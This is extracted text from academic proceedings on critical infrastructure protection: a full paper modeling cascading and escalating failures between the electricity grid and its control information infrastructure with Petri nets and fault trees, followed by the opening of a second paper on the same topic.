3. Beyer, U., Flentge, F.: Towards a Holistic Metamodel for Systems of Critical Infrastructures. In: ECN CIIP Newsletter (October/November 2006) 4. Staab, S., Studer, R. (eds.): Handbook on Ontologies. International Handbooks on Information Systems. Springer, Heidelberg (2004) 5. Bernardi, S., Merseguer, J.: A UML Profile for Dependability Analysis of RealTime Embedded Systems. In: Proc. WOSP 2007, Buenos Aires, Argentina (February 2007) 6. Annoni, A.: Orchestra: Developing a Unified Open Architecture for Risk Management Applications. In: van Oosterom, P., et al. (eds.) Geo-information for Disaster Management. Springer, Heidelberg (2005) 7. Schmitz, W., et al.: Interdependency Taxonomy and Interdependency Approaches. The IRRIIS Consortium, Deliverable D.2.2.1. (June 2007) 8. Alexiev, V., et al.: Information Integration with Ontologies. Wiley, Sussex (2005) 9. Rathnam, T.: Using Ontologies To Support Interoperability In Federated Simulation, M.Sc. thesis, Georgia Institute of Technology, Atlanta, GA, USA (August 2004) 10. Borst, W.: Construction of Engineering Ontologies, Centre of Telematica and Information Technology, University of Tweenty, Enschede, The Netherlands (1997) 11. Gruber, T.: Toward Principles for the Design of Ontologies Used for Knowledge Sharing. In: Proceedings of the International Workshop on Formal Ontology, Padova, Italy (1993) 12. Cerotti, D., Codetta-Raiteri, D., Donatelli, S., Dondossola, G., Garrone, F.: Representing the CRUTIAL project domain by means of UML diagrams. In: Proc. CRITIS 2007, Malaga, Spain (October 2007) 13. Kr¨ oger, W.: Reliability Engineering and System Safety. Reliability Engineering and System Safety 93, 1781–1787 (2008) 14. Min, H.J., Beyeler, W., Brown, T., Son, Y.J., Jones, A.T.: Toward modeling and simulation of national CI interdependencies. IIE Transactions 39, 57–71 (2007) 15. Hopkinson, K., Wang, X., Giovanini, R., Thorp, J., Birman, K., Coury, D.: EPOCHS: A Platform for Agent-Based Electric Power and Communication Simulation Built from Commercial Off-The-Shelf Components. IEEE Transactions on Power Systems 21(2), 548–559 (2006)
Multi-level Dependability Modeling of Interdependencies between the Electricity and Information Infrastructures Marco Beccuti1 , Giuliana Franceschinis1 , Mohamed Kaˆaniche2 , and Karama Kanoun2 1
Dip. di Informatica, Univ. del Piemonte Orientale, 15100 Alessandria, Italy {beccuti,giuliana}@mfn.unipmn.it 2 LAAS-CNRS, Univ. de Toulouse, F-31077 Toulouse, France {mohamed.kaaniche,karama.kanoun}@laas.fr
Abstract. The interdependencies between infrastructures may be the cause of serious problems in mission/safety critical systems. In the CRUTIAL1 project the interdependencies between the electricity infrastructure (EI) and the information infrastructure (II) responsible for its control, maintenance and management have been thoroughly studied; moreover countermeasures to substantially reduce the risk to interrupt the service have been developed in the project. The possible interdependencies have been investigated by means of model at different abstraction levels. In this paper, we present high level models describing the various interdependencies between the EI and the II infrastructures, then we illustrate on a simple scenario how these models can be detailed to allow the evaluation of some measures of dependability.
1
Introduction
There is a wide consensus that developing modeling frameworks for understanding interdependencies among critical infrastructures and analyzing their impact is a necessary step for building interconnected infrastructures on which a justified level of confidence can be placed with respect to their robustness to potential vulnerabilities and disruptions. Modeling can provide useful insights into how component failures might propagate and lead to cascading, or escalating failures in interdependent infrastructures, and assess the impact of these failures on the service delivered to the users. In the context of CRUTIAL, we focus on two interdependent infrastructures: the electric power infrastructure (EI) and the information infrastructure (II) supporting management, business, control and maintenance functionality. As discussed in [3], there has been extensive work on the modeling of individual infrastructures and various methods and tools have been developed to predict the consequences of potential disruptions within an individual infrastructure. 1
CRUTIAL (Critical Utility Infrastructure resilience), FP6 European Project (http://crutial.cesiricerca.it)
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 48–59, 2009. c Springer-Verlag Berlin Heidelberg 2009
Multi-level Dependability Modeling of Interdependencies
49
However, the modeling and evaluation of interdependent infrastructures is still at an exploratory stage. The modeling activities carried out in CRUTIAL aim at contributing to fill this gap taking into account in particular: a) the three types of failures that are characteristic of interdependent infrastructures [6] (cascading2 , escalating3, and common-cause failures), b) various classes of faults that can occur, including accidental as well as malicious threats, c) the temporal and structural characteristics of the power and information infrastructures investigated. A major challenge lies in the complexity of the modeled infrastructures in terms of largeness, multiplicity of interactions and types of interdependencies involved. To address this problem, a number of abstractions and appropriate approaches for composition of models are necessary. In CRUTIAL, the interdependencies have been analyzed at different levels: from a very abstract view expressing the essence of the typical phenomena due to the presence of interdependencies, to an intermediate detail level representing in a rather abstract way the structure of the system (in some scenarios of interest), to a quite detailed level where the system components and their interactions are modeled in a fairly realistic way and simulation is used to derive interesting reliability measures. In this paper a two-level modeling approach is proposed and illustrated through a simple scenario inspired by the CRUTIAL project. This is part of a multi-level and multi-formalism approach to the qualitative and quantitative study of the interdependencies between the EI and the II controlling and managing it. In Section 2, the highest abstraction level is considered, showing the sequences of (abstract) events leading to typical interdependency phenomena such as cascading and escalation. In Section 3, a (simple) scenario is used to illustrate a more refined, second level representation, from which quantitative information can be provided to enable performance/reliability analysis. We will show how the higher level models can be composed with the more refined one and used to highlight possible instantiations of the abstract interdependencies phenomena. Section 4 concludes the paper.
2
High-Level Abstract Models of Interdependencies
This section summarizes the high-level abstract models presented in [5]. We model the EI and II behavior globally, taking into account the impact of failures in the infrastructures, and their effects on both infrastructures, without taking into account explicitly their underlying implementation structure. For sake of clarity, events and states of the II are prefixed by i- while those of the EI are prefixed by e-. We first address accidental failures in II, then malicious attacks. 2 3
Cascading failures occur when a failure in one infrastructure causes the failure of one or more component(s) in a second infrastructure. Escalating failures occur when an existing failure in one infrastructure exacerbates an independent failure in another infrastructure, increasing its severity or the time for recovery and restoration from this failure.
50
2.1
M. Beccuti et al.
Accidental Failure Model
The model, given in Fig. 1, is based on assumptions related to the behavior of the infrastructures as resulting from their failures and mutual interdependencies. These assumptions are summarized, before commenting the model. Impact of i-failures. Accidental i-failures, affecting the II can be either masked (unsignaled) i-failures, leading to latent errors, or signaled. Latent errors can be either passive (i.e., without any action on the EI, but keeping the operators uninformed of possible disruptions occurring in the EI) or active (provoking undue configuration changes in the EI). After signaled i-failures, the II is in a partial i-outage state. Latent errors can accumulate. Signaled i-failures may take place when the II is in latent error states. When the II is in a partial ioutage state, i-restoration is necessary to bring it back to an i-working state. We assume that an i-failure puts some constraints on the EI (i.e., cascading failure), leading to a weakened EI (e.g., with a lower performance, unduly isolations, or unnecessary off-line trips of production plants or of transmission lines). From an e-weakened state after a signaled i-failure, an e-configuration restoration leads EI back into a working state, because no e-failures occurred in the EI. Accumulation of untimely configuration changes, may lead to e-lost state (i.e., a blackout state), from which an e-restoration is required to bring back the EI into an e-working state. The above events and the resulting states are recapitulated in Table 1.
Fig. 1. Model of the two infrastructures when considering accidental failures
Multi-level Dependability Modeling of Interdependencies
51
Table 1. States and events of the information infrastructure (II) Events Signaled i-failure Masked i-failure i-restoration
Detected i-failure. Undetected i-failure. Action for bringing back the II in its normal functioning after ifailure(s).
States i-working The II ensures normal control of the EI. Passive latent error Parts of the II have an i-failure, which prevents monitoring of the EI: e-failures may remain unnoticed. Active latent error Parts of the II have an i-failure, that may lead to unnecessary, and unnoticed configuration changes. Partial i-outage Parts of the II have knowingly an i-failure. Partial i-outage is assumed: the variety of functions and of the components of the infrastructure, and its essential character of large network make unlikely total outage. i-weakened Parts of the II can no longer implement their functions, although they do not have an i-failure, due to constraints originating from e-failures (e.g., shortage of electricity supply of unprotected parts).
Table 2. States and events of the electricity infrastructure (EI) Events e-failure
Malfunctioning of elements of the power grid: production plants, transformers, transmission lines, breakers, etc. e-restoration Actions for bringing back the EI in its normal functioning after e-failure(s) occurred. Typically, e-restoration is a sequence of configuration change(s), repair(s), configuration restoration(s). e-configuration change Change of configuration of the power grid that are not immediate consequences of e-failures, e.g., off-line trips of production plants or of transmission lines. e-configuration restoration Act of bringing back the EI in its initial configuration, when configuration changes have taken place. States e-working Electricity production, transmission and distribution are ensured in normal conditions. Partial e-outage Due to e-failure(s), electricity production, transmission and distribution are no longer ensured in normal conditions, they are however somehow ensured, in degraded conditions. e-lost Propagation of e-failures within the EI led to losing its control, i.e., a blackout occurred. e-weakened Electricity production, transmission and distribution are no longer ensured in normal conditions, due to i-failure(s) of the II that constrain the functioning of the EI, although no e-failure occurred in the latter. The capability of the EI is degraded: lower performance, configuration changes, possible manual control, etc.
Impact of e-failures. We consider that the occurrence of e-failures leads the EI to be in a partial e-outage state, unless propagation within the infrastructure leads to losing its control (e.g., a blackout of the power grid) because of an i-failure
52
M. Beccuti et al.
(this latter case corresponds to escalating events). Also e-failures may lead the II to an i-weakened state in which parts of the II can no longer implement their functions, although they are not failed, due to constraints originating from the failure of the EI. The above events and the states are recapitulated in Table 2. 2.2
Malicious Attacks Model
Attacks fall into two classes: deceptive attacks provoking unperceived malfunctions, thus similar to the latent errors previously considered, and perceptible attacks creating detected damages. Deceptive attacks can be passive (i.e., without any direct action of the II on the EI) or active, provoking configuration changes in the EI, by the II. Fig. 2 gives the state machine model of the infrastructures. Due to the very nature of attacks, a distinction has to be performed for both infrastructures between their real status and their apparent status. For the EI, the apparent status is as reported by the II. Models of Figs. 1 and 2 are very similar: they differ by the semantics of the states and of the inter-state transitions. In state 2, the effects of the passive deceptive attack are: i) the II looks like working while it is in a partial i-outage state due to the attack, ii) it does not perform any action on the EI, but informs wrongly the operator that the EI is in partial e-outage, and as consequence iii) the operator performs some configuration changes in the EI leading it to an e-weakened state. Accumulation of configuration changes by the operator may lead the EI into e-lost state.
Fig. 2. Model of the two infrastructures when considering malicious attacks
Multi-level Dependability Modeling of Interdependencies
53
In state 3, the effects of the active deceptive attack are: i) the II looks like working while it is in a partial i-outage state due to the attack, ii)it performs some configuration changes in the EI leading it to an e-weakened state without informing the operator, for whom the EI appears as if it were working. Accumulation of configuration changes by the II may lead the EI into a e-lost state. The difference between states 2 and 3 is that in state 2 the operator has made some actions on the EI, while in state 3 the operator is not aware of the actions performed by the II on the EI. After detection of the attack, the apparent states of the infrastructures become identical to the real ones (state 4), in which i-restoration and e-configuration restoration are necessary to bring back the infrastructures to their working states. States 5, 6 and 7 are very similar respectively to states 5, 6 and 7 of Fig. 1, except that in state 6 the II is in a partial i-outage state following a perceptible attack in Fig. 2 and following a signaled i-failure in Fig. 1. State 8 corresponds to e-lost state but the operator is not aware, he has been informed wrongly by the partial i-outage of II that it is in a partial e-outage state. 2.3
Global Conceptual Model
The global abstract model, taking into account both accidental failures and malicious attacks, results from the superposition of the two models. In [4], a unified model is presented. In this paper we have presented the separate models for sake of simplicity. Our aim is to illustrate how to join the abstract modeling level to detailed models allowing dependability quantification.
3
Detailed Models of Scenarios
The high level abstract models show typical failure scenarios and the combined states of the infrastructures as resulting from their interdependencies. The evaluation of quantitative dependability measures based on these models requires the specification of the probability distributions associated with the transitions of the abstract models. As these transitions result from the occurrence of several elementary events affecting the components of the infrastructures, the development of more detailed models highlighting these events and taking into account the internal behavior of the infrastructures should help to identify representative probability distributions. States in Fig. 1 and 2 are in reality macro states gathering a set of elementary states of the infrastructures in which the service delivered is equivalent. Let us for example consider the transition from state 1 to state 4 in Fig. 1. This transition takes place only when the accumulation of elementary events result in a significant degradation of the service delivered by EI, leading it to an “e-weakened state”. Quantification of dependability measures requires to model the underlying systems behavior. A measure of dependability could be for example the distribution of the time to reach state 4 from state 1, either directly or through states
54
M. Beccuti et al.
2 and 3, i.e., the distribution of the time to a signaled failure (Fig. 1), or the distribution of the time to a perceptible attack (Fig. 2). In this section, we show a simple example of a detailed model allowing the evaluation of this distribution. We will describe the underlying system and its associated models and show the relationship between the detailed and the highlevel abstract model. 3.1
A More Detailed Model of a Simple Scenario
The system considered is described in [2] and it is illustrated in Fig. 3. It represents the teleoperation function performed between a Control Centre (CC) and a SubStation (SS), by means of a communication network. We suppose that the communication between the sites is performed in the following way: the CC sends requests to the SS to obtain the execution of a command by the SS (e.g., arming), or to retrieve data from the SS (signals, measures, etc.). The SS replies to the CC by acknowledging the command execution, or by sending the required data. Each communication needs a minimum level of available bandwidth to be completed. In this context we consider two types of i-failures, bringing the system from state 1 to state 4 of Figs 1 and 2 models, respectively. 1. A signaled i-failure of the CC that can occur in the two following cases: the TELECONTROL devices (ATS or ATS Web Server) are not available or the communication inside the CC is not available due to the failure of either Local Area Network (LAN, Firewall and Router). 2. A perceptible denial of service (DoS) attack to the communication network. Such attack consists of sending a high number of packets on the communication network, with the effect of reducing the available bandwidth and causing excessive delay or loss of packets between CC and SS. A DoS attack may last for a random period of time, and it may be blocked by the success of a countermeasure (firewalling, traffic monitoring, etc.).
Fig. 3. Architecture of the EI and II considered for the example
Multi-level Dependability Modeling of Interdependencies
3.2
55
Description of the Model
For modeling the above scenario we use a multi-formalism combining the Stochastic Well-formed Net (SWN) [1] and Fault Tree (FT) [7] formalisms. In particular, the multi-formalism model is composed by two submodels: an SWN model and an FT model. The first is an SWN model (Fig. 4), which represents the exchange of requests and replies between the CC and the SS by means of the communication network, and the possibility of the occurrence of a DoS attack on the same network. Instead the second one, a FT model (Fig. 5), represents the failure mode of the CC. The SWN is an High Level Stochastic Petri Net formalism. Places (circles) containing tokens (which in HLPN can carry information) represent the state, while transitions (boxes) represent state changes whose preconditions and effects are represented by arcs. Transition firing times are random variables. The fact that tokens can carry information make the model parametric: e.g. each message can have a distinct identifier, moreover the model can be easily extended to represent several SS. Finally, SWN models can be studied through very efficient analysis techniques exploiting the presence of symmetries in the model. SWN model description. The SWN model is shown in Fig. 4 where the dashed boxes represent the CC, the SS and the attacker respectively. The transition CC send models the generation of a request to be sent to the SS, by putting a token inside the place CC buf f er out and inside the place Commands describing the requests to be sent on the network, and the requests waiting for a reply, respectively. The bandwidth is modeled by a set of tokens inside the place Bandwidth; each time a request has to be sent (a token is present in CC buf f er out), the marking of Bandwidth is reduced by one for modeling the reduction of bandwidth due to the transmission (transition CC transmit). When the transition CC transmit fires, the token representing the request is moved from the place CC out to the place SS buf f er in, in order to model the receipt of the request by the SS. Moreover, the firing of CC transmit determines the increase of the marking of the place Bandwidth, in order to model the fact that more bandwidth is now available. The requests to be processed by the SS are represented by tokens inside the place SS buf f er in. The processing is modeled by the transition process. The replies are represented by tokens put inside the place SS buf f er out; their transmission is represented by the transition SS transmit; as in the case of the requests, the transmission of replies determines a temporary decrease of the marking of the place Bandwidth. Once the reply is received by the CC (token inside the place CC buf f er in), the corresponding pending request is removed from the place Commands. The failure event of the CC is modeled by transition CC f ail: its firing time distribution is given by the FT. The firing of such transition leads to the marking of the place CC f ailed modeling the state of failure. The marking of CC f ailed causes the inhibition of the transition CC send. The attacker state is modeled by the places Idle and Active; the initial state is idle, but it can turn to active after the firing of the transition Begin attack.
56
M. Beccuti et al.
CONTROL CENTRE
recovery
perceptible attack n Delay
afterPA RS Packet_loss
signaled failure
recovery1
CC_Failed CC_Fail
CC_buffer_in
C1
C1
afterSF
Fault Tree
CC_buffer_out
C1
C1
Commands
CC_transmit
CC_out
CC_send
Begin_attack Active
AT_transmit
AT_out
AT_buffer_out
BW Bandwidth Idle AT_send End_attack DoS ATTACKER
C1
process
C1
SS_out
SS_buffer_in
SS_buffer_out
SS_transmit
C1
SUBSTATION
Fig. 4. SWN model representing the exchange of requests and replies between the CC and the SS by means of the communication network CONTROL_CENTRE
TELECONTROL
ATS WEB SERVER
ATS
NETWORK
ROUTER
LAN
FIREWALL
Fig. 5. FT model representing the failure mode of the CC
Multi-level Dependability Modeling of Interdependencies
57
In the active state, the attacker generates packets (transition AT send) to be transmitted on the communication network (transition AT transmit). As in the case of the transmission of requests and replies, the transmission of the attacker packets determines the reduction of the marking of the place Bandwidth. The complete unavailability of the bandwidth (the success of the DoS attack) is modeled by the place DoS becoming marked when no tokens are present in the place Bandwidth. The state of the attacker can turn back to idle if the transition End attack fires representing the discovery of the attack by some countermeasure. The loss of replies is modeled by the timed transition Delay: if a token (pending request) stays inside the place Commands for a long time (the corresponding reply has not been received during that time), the transition Delay may fire leading to the marking of the place P acket loss modeling the loss of a reply. Moreover, transition RT removes a token from the place P acket loss. Finally the transitions perceptible attack, signaled failure, recovery and recovery1, and the places af terP A and af terSF are used for mapping this model on the abstract model (Sect. 2), as we will describe in details in the next section. FT model description. Fig. 5 shows the FT model representing the failure mode of the CC. Such failure is represented by the top event called CONTROL CENTRE. Such event is the output of an OR gate whose inputs are the event TELECONTROL and NETWORK ; therefore, the top event (the CC failure) occurs if the telecontrol function or CC network fails. The event T ELECON T ROL represents the failure of the telecontrol devices; such event is the output of an OR gate having AT S and AT S W EB SERV ER as input events. Therefore the event T ELECON T ROL is caused by the failure of the AT S or by the failure of ATS WEB SERVER. Finally the N ET W ORK fails if the ROU T ER, the FIREWALL or the LAN fails. 3.3
Interpretation of the Model Measures w.r.t. the Abstract Model
The abstract model introduced in Sect. 2 allows capturing at a high abstraction level the interesting interdependency phenomena. The example introduced in Sect. 3.2 can be mapped on the abstract model as follows: 1. The signaled i-failure in the CC is triggered by the firing of the transition CC f ailed whose firing time is controlled by the FT model. 2.The perceptible attack corresponds to a loss of responsiveness due to a DoS attack and is modeled by a transition firing activated when n commands are lost in a short period. Observe that in the model command messages (and the corresponding acknowledgments) are never actually lost, however if the acknowledgment of a transmitted command arrives later than a specified maximum amount of time, this is interpreted as a command loss. This mechanism is implemented by introducing a Delay transition, activated when a command has been sent from the CC, and working as a timeout used to record an excessive delay of the command acknowledge. When Delay fires, another timeout starts to count, which is used to forget about command/acknowledge losses after a certain time since their occurrence. If the model manages to accumulate enough (n) command
58
M. Beccuti et al.
losses before they expire, this is interpreted as an indication that some misbehavior is happening which should be signaled. The connection between the detailed and abstract models can be performed in different ways: the first option is to define a correspondence among states: so for example we could say that all states with at least one token in place af terP A or in place af terSF correspond to state 4 while all states where these two places are not marked correspond to state 1. So to compute the distribution of the time required to reach abstract state 4 from abstract state 1 can be performed on the detailed model by simply making the states with m(af terP A)+m(af terSF ) > 0 as absorbing and computing on the model the distribution of the time to absorption. If we consider also the possibility of restoration (which for the moment is represented in the detailed model as two simple ”reset” transitions, called recovery and recovery1, which bring the whole net back to the initial state), then we can also compute steady state behavior measures, e.g., the probability of being in state 1 or 4. The alternative way to couple the two models is by making a correspondence between the transitions: in this example this is particularly simple because transitions ”Signaled failure” and ”Perceptible attack” (as well as “recovery” and“recovery1”) can be directly put in correspondence with the homonymous transitions in the abstract model: in this case the mapping among the states is indirect (but can be made explicit by adding some “implicit places” in the detailed model representing the abstract model states and connect them to the matching transitions). Finally, in order to compute performance measures it is necessary to associate a firing delay probability distribution with every timed transition in the detailed model. These firing delay probability distributions can be deduced from experimental data obtained both by real system behavior observation and by testbed simulation. After that, if all these distributions can be expressed by negative exponential distributions then the system performance measures can be computed by numerical analysis, else by simulation.
4
Conclusion and Perspective
This paper presented a dependability modeling approach that takes into account interdependencies related failures affecting electrical infrastructures and associated information infrastructures supporting e.g., management, control and monitoring activities. Two abstraction levels are considered. At the highest level, each infrastructure is modeled globally as a black box and the proposed models identify cascading and escalating related failure scenarios and corresponding service restoration actions resulting from accidental failures or malicious attacks. The failure scenarios highlighted at this abstraction level result from the occurrence and propagation of elementary events originating from the subsystems and components of the infrastructures. The development of detailed models taking into account the structure and the internal behaviour of the infrastructures is useful to link the elementary failure events to the high level scenarios of cascading and escalating failures. Also,
Multi-level Dependability Modeling of Interdependencies
59
the detailed models can contribute to the definition of the probability distributions to be associated with the transitions in the high level abstract model to evaluate quantitative measures characterizing the impact of interdependencies with regards to the occurrence of blackouts. One of the critical issues that need to be addressed in this context is the mapping of the detailed models to the high-level abstract models. The example presented in this paper, inspired from a case study investigated in CRUTIAL, is aimed at illustrating how this mapping can be achieved and how the effects of accidental and malicious failures can be analyzed together. So far we have considered simple scenarios. More complex detailed models are currently investigated, taking into account the main subsystems and components of both the electrical and the information infrastructures. Two other possible directions of future work are: (1) the compositional construction of the higher abstraction level models from submodels of the two infrastructures highlighting the cause-effect relations between events: this can be done either using automata or using Petri Nets (the latter choice would also ease the successive composition with lower level PN models), (2) adding a further level of detail (typically corresponding to accurate simulation models) from which the quantitative parameters of the intermediate level models can be deduced when direct measures from true systems are not available. Acknowledgment. This work is partially funded by the European Commission through the CRUTIAL project. All our thanks to Jean Claude Laprie who developed the main concepts behind the abstract model of interdependencies used in this paper.
References 1. Chiola, G., Dutheillet, C., Franceschinis, G., Haddad, S.: Stochastic well-formed coloured nets for symmetric modelling applications. IEEE Transactions on Computers 42(11), 1343–1360 (1993) 2. Garonne, F., et al.: Analysis of new control applications. Crutial Deliverable D2 (2007), http://crutial.cesiricerca.it/Dissemination 3. Kaˆ aniche, M., et al.: Methodologies Synthesis. Crutial Deliverable D3 (2007), http://crutial.cesiricerca.it/Dissemination 4. Kaˆ aniche, M., et al.: Preliminary modelling framework. Crutial Deliverable D8 (2008), http://crutial.cesiricerca.it/Dissemination 5. Laprie, J.-C., Kanoun, K., Kaˆ aniche, M.: Modelling interdependencies between the electricity and information infrastructures. In: Saglietti, F., Oster, N. (eds.) SAFECOMP 2007. LNCS, vol. 4680, pp. 54–67. Springer, Heidelberg (2007) 6. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems Magazine 42(11), 11–25 (2001) 7. Schneeweiss, W.G.: The Fault Tree Method. LiLoLe Verlag (1999)
Interdependency Analysis in Electric Power Systems Silvano Chiaradonna1, Felicita Di Giandomenico1, and Paolo Lollini2 1
2
Italian National Research Council, ISTI Dept., via Moruzzi 1, I-56124, Pisa, Italy {chiaradonna,digiandomenico}@isti.cnr.it Universit`a degli Studi di Firenze, Dip. Sistemi e Informatica, viale Morgagni 65, I-50134, Firenze, Italy
[email protected] Abstract. Electric Power Systems (EPS) are composed by two interdependent infrastructures: Electric Infrastructure (EI) and its Information-Technology based Control System (ITCS), which controls and manages EI. In this paper we address the interdependency analysis in EPS focusing on the cyber interdependencies between ITCS and EI, aiming to evaluate their impact on blackouts-related indicators. The obtained results contribute to better understand the EPS vulnerabilities, and are expected to provide useful guidelines towards enhanced design choices for EPS protection at architectural level.
1 Introduction Nowadays, public health, economy, security and quality of life heavily depend on the resiliency of a number of critical infrastructures, including energy, telecommunications, transportation, emergency services and many others. The technological advances and the necessity for improved efficiency resulted in increasingly automated and interlinked infrastructures, with consequences on increased vulnerabilities to accidental and human-made faults. Modeling the interdependencies among such interlinked infrastructures and assessing interdependencies impacts on the ability of the system to provide resilient and secure services are of primarily importance. Following this analysis, steps can be taken to mitigate the identified vulnerabilities. Critical infrastructure protection is therefore a priority for most of the countries, and several initiatives are in place to identify open issues and research viable solutions in this highly challenging area, especially to identify vulnerabilities and devise survivability enhancements on critical areas. An overview of relevant current initiatives in this field is provided in [1]. Among such initiatives, the European project CRUTIAL [5] addresses new networked systems based on Information and Communication Technology for the management of the electric power grid, in which artefacts controlling the physical process of electricity transportation need to be connected with information infrastructures, through corporate networks (intra-nets), which are in turn connected to the Internet. A major research line of the project focuses on the development of a model-based methodology for the dependability and security analysis of the power grid information infrastructures. One of the approaches pursued in CRUTIAL is a model-based quantitative support for the analysis and evaluation of critical scenarios in EPS. An overview of the developed quantitative modeling framework is in [3,1]. It is based on generic models capturing structural R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 60–71, 2009. c Springer-Verlag Berlin Heidelberg 2009
Interdependency Analysis in Electric Power Systems
61
and behavioral aspects of the two involved infrastructures: the electric infrastructure, EI, and the information-technology based control systems (ITCS). The novelty with respect to traditional analyses of EPS systems is that the framework explicitly takes into account the various forms of interactions which are the vehicles through which failures are propagated to possibly end up with cascading, escalating and common-mode outages. As a follow up of these previous studies, the contribution of this paper consists in the application of the developed modeling framework to a case study in the electric power system under different system conditions. The goal is to show the practical usage of the framework in assessing quantitative values for user-oriented measures in the electric field and to highlight some of the potentialities of the framework in analyzing the various aspects involved in the complex relationships between EI and ITCS in EPS. The obtained results are useful in getting insights and to understand the interplay of failure phenomena and critical system functions (like repair of failed components/subsystems), so to derive useful guidelines towards configurations enhancing resiliency and survivability. The paper is organized as follows. Section 2 introduces the logical structure of the electric power system instance we have considered in our study. The next Section 3 focuses on the failures of the information control infrastructure and their consequences on the controlled electric infrastructure. The overall model of the considered EPS instance is sketched in Section 4. The analyzed case study, in terms of electric grid topology, the varying system conditions as well as the measures of interest is introduced in the next Section 5. The results of the numerical evaluation are discussed in Section 6. Finally, conclusions are summarized in Section 7.
2 The Analyzed EPS Instance The logical structure of the analyzed EPS instance is depicted in Figure 1. For the sake of simplicity, the proposed EPS instance is limited to a homogeneous region of the transmission grid and to the corresponding regional control system. In the bottom part of Figure 1 we can see the main elements that constitute the overall electric infrastructure, and thus in particular a region of the transmission power grid: generators (NG components), substations (NS components), loads (NL components) and power lines (AL components, which also logically include breakers and protections connected to the power lines). The energy produced by the generators is adapted by transformers, to be conveyed with minimal dispersion, to the different types of end users (loads), through different power grids. The power lines are components that physically connect the substations with the power plants and the final users, and the substations are structured components in which the electric power is transformed and split over several lines. In the substations there are transformers and several kinds of connection components (like bus-bars, protections and breakers). Information-Technology based Control System (ITCS) implements the information control system managing the electrical grid. Among the several logical components composing ITCS (all detailed in [3]), here we focus the attention on the tele-operation system for a region of the transmission grid (named T T OS), since its failure can affect a large portion of the grid, also leading to black-out phenomena. In the upper part of
62
S. Chiaradonna, F. Di Giandomenico, and P. Lollini
Regional ITCS
RTS
ComNet
LCS
. . . LCS
NG
AL NG
AL
LCS
.
. . . LCS
NS
LCS
AL NS
AL
..
.
. . . LCS
NL
AL
NS Substations
LCS
NL
...
..
NG Generators
LCS
...
Regional Transmission Grid
LCS
AL
..
. NL
Loads
Fig. 1. Logical structure of the analyzed EPS instance
Figure 1 we have depicted a possible logical structure of a regional ITCS, i.e., the part of the information control system controlling and operating on a region of the transmission grid. The components LCS (Local Control System) and RT S (Regional Tele-control System) differ for their criticality and for the locality of their decisions, and they can exchange grid status information and control data over a (public or private) network (ComNet component). LCS guarantees the correct operation of a node equipment and reconfigures the node in case of breakdown of some apparatus. It includes the acquisition and control equipment (sensors and actuators). RT S monitors its assigned region in order to diagnose faults on the power lines. In case of breakdowns, it chooses the most suitable corrective actions to restore the functionality of the grid. Since RT S is not directly connected to the substations, the corrective actions to adopt are put in operation through the pertinent LCS. 2.1 RTS/LCS Reconfiguration Strategies, and EI Autoevolution The main operations performed by ITCS on EI are to control its correct functioning and to activate proper reconfigurations in case of failure of, or integration of, repaired/new EI components. Such operations are not considered in detail but they are abstracted at two levels, on the basis of the locality of the EI state considered by ITCS to decide on proper reactions to disruptions (the same approach adopted in [4]). Each level is characterized by an activation condition (that specifies the events that enable the ITCS reaction), a reaction delay (representing the overall computation and application time needed by ITCS to apply a reconfiguration) and a reconfiguration strategy (RS), based on generation re-dispatch and/or load shedding. The reconfiguration strategy RS defines how the configuration of EI changes when ITCS reacts to a failure. For each level, a different reconfiguration function is considered:
Interdependency Analysis in Electric Power Systems
63
– RS1 (), to represent the effect on the regional transmission grid of the reactions of ITCS to an event that has compromised the electrical equilibrium1 of EI, when only the state local to the affected EI components is considered. Given the limited information necessary to issue its output, RS1 () is deemed to be local and fast in providing its reaction. RS1 () is performed by LCS components when they locally detect that there is no (electrical) equilibrium. – RS2 (), to represent the effect on the regional transmission grid of the reactions of ITCS to an event that has compromised the electrical equilibrium of EI, when the state global to all the EI system under the control of ITCS is considered. Therefore, differently from RS1 (), RS2 () is deemed to be global and slower in providing its reaction. When new events occur changing the status of EI during the evaluation of RS2 (), then the evaluation of RS2 () is restarted based on the new topology generated by such events. RS2 () is performed by RTS. The activation condition, the reaction delay and the definition of the functions RS1 () and RS2 () depend on the policies and algorithms adopted by T T OS. An autoevolution function AS() is also considered to represent automatic evolution of EI each time an event modifying the grid topology occurs. In this case, EI tries to find a new electrical equilibrium for the new grid topology, by changing the values of the power flow through the lines but leaving the generated and consumed power unchanged (only redirection of current flows). The new equilibrium is reached instantaneously (if any) and no ITCS actions are performed. Otherwise, LCS and RT S operations, i.e. RS1 () and RS2 () respectively, are triggered. 2.2 About RS1 (), RS2 () and AS() Implementation Some simplifying assumptions have been made to represent the power flow through the transmission grid, following the same approach used in [4,5,6,7]. Therefore, the state and the evolution of the transmission grid are described by the active power flow F on the lines and the active power P at the nodes (generators, loads or substations), which satisfy linear equations for a direct current (DC) load flow approximation of the AC system. In the considered instance, the output values of AS() for active power flow F on the power lines are derived by solving a linear power flow equation system for fixed values of P. The output values of RS1 () and RS2 () for P and F are derived considering that for a given power demand, the power flow equations do not have a unique solution. The adopted definition for the function RS1 () is given by the solution (values for P and F) of power flow equations while minimizing a simple cost function, indicating the cost incurred in having loads not satisfied and having the generators producing more power. The output values of RS2 () for P and F are derived by solving an optimization problem to minimize the change in generation or load shedding, considering more sophisticated system constraints, as described in [4]. The reconfiguration strategy RS1 () is applied immediately, while RS2 () is applied after a time needed to RT S to evaluate it. All these 1
Events that impact on the electrical equilibrium are typically an EI component’s failure or the insertion of a new/repaired EI component; for simplicity, in the following we will mainly refer to failures.
64
S. Chiaradonna, F. Di Giandomenico, and P. Lollini
functions are based on the state of EI at the time immediately before the occurrence of the failure.
